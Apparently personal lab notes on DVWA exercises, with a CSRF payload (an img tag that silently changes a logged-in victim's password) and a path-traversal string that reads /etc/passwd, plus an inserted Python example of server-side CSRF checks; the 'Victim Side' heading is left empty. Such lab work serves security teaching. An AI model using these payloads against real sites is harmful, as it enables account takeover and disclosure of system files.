DVWA Exercises 3

05 CSRF Attack

Let's type in a password and grab the request in Burp.

The attacker must prepare a website containing a manipulated request string. This attack only works if the victim is logged in to the target website (the session cookie must be valid) and clicks on the manipulated link.

Attacker's Side:

cd /home/hacker

mkdir webroot

python3 -m http.server 8001

Create an HTML file with the following content:

<img src="http://10.70.0.1/vulnerabilities/csrf/?password_new=Secret1&password_conf=Secret1&Change=Change">
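To show the defender's side of this exercise, here is an added Python example (not part of DVWA or these notes) of the server-side checks that make the img-tag request above fail: it models the decision for the change-password endpoint on 10.70.0.1, and assumes the token field is named user_token and the attacker's page is served from a hypothetical host attacker.example:8001.

```python
import hmac
import secrets
from urllib.parse import urlparse

# Origin of the DVWA instance targeted in the exercise.
SITE_ORIGIN = "http://10.70.0.1"

def same_origin(url):
    # Compare scheme + host[:port] of an Origin/Referer value with our own site.
    if not url:
        return False
    p = urlparse(url)
    return f"{p.scheme}://{p.netloc}" == SITE_ORIGIN

def check_csrf(request, session):
    # request: dict with 'method', 'headers', 'params'; session: dict holding the
    # per-session token the server embedded in its own form. Returns (allowed, reason).
    # An <img src=...> can only issue a GET, so refusing state changes over GET
    # alone defeats the payload used in the exercise.
    if request["method"] != "POST":
        return False, "state change via GET"
    # Origin header (Referer as fallback) must name our own site.
    origin = request["headers"].get("Origin") or request["headers"].get("Referer")
    if not same_origin(origin):
        return False, f"cross-site origin {origin!r}"
    # Synchronizer token: a third-party page cannot read the session's token
    # (same-origin policy), so it cannot supply a matching value.
    token = request["params"].get("user_token", "")
    if not hmac.compare_digest(token.encode(), session["csrf_token"].encode()):
        return False, "missing or wrong CSRF token"
    return True, "ok"

# Constructed sample data, not captured traffic.
SESSION = {"csrf_token": secrets.token_hex(16)}

# What the victim's browser sends when it renders the attacker's <img> tag:
# a GET with the session cookie attached and the attacker's page as Referer.
FORGED = {
    "method": "GET",
    "headers": {"Referer": "http://attacker.example:8001/"},  # hypothetical host
    "params": {"password_new": "Secret1", "password_conf": "Secret1", "Change": "Change"},
}

# A genuine submission of DVWA's own change-password form.
LEGIT = {
    "method": "POST",
    "headers": {"Origin": SITE_ORIGIN},
    "params": {"password_new": "Secret1", "password_conf": "Secret1",
               "Change": "Change", "user_token": SESSION["csrf_token"]},
}
```

Running check_csrf(FORGED, SESSION) rejects the forged request at the first check, while check_csrf(LEGIT, SESSION) passes all three.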

Victim Side:

06 File Inclusion

Attack string:

http://172.17.0.1/vulnerabilities/fi/?page=../../../../../etc/passwd
